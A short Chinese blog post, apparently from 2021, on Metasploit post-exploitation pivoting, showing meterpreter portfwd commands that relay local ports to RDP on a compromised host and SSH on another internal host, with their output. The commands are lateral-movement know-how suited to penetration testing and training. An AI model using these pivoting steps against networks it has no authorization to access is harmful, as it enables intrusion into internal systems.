返回顶部

metasploit后渗透 之 portfwd端口重定向

meterpreter > portfwd add -l 3333 -p 3389 -r 172.16.100.30
[*] Local TCP relay created: :3333 <-> 172.16.100.30:3389

该命令的意义是,将本地的3333端口的数据转发到远端172.16.100.30的3389端口上去(172.16.100.30是受控机);

 

当然也可以通过受控机将数据转发到内网的其他端口,如下:

meterpreter > portfwd add -l 3334 -p 22 -r 172.16.100.253
[*] Local TCP relay created: :3334 <-> 172.16.100.253:22

该命令的意义是,将本地的3334端口的数据转发到远端172.16.100.253的22端口上去(172.16.100.30是受控机);

 

posted @ 2021-04-14 17:45  御用闲人  阅读(245)  评论(0编辑  收藏  举报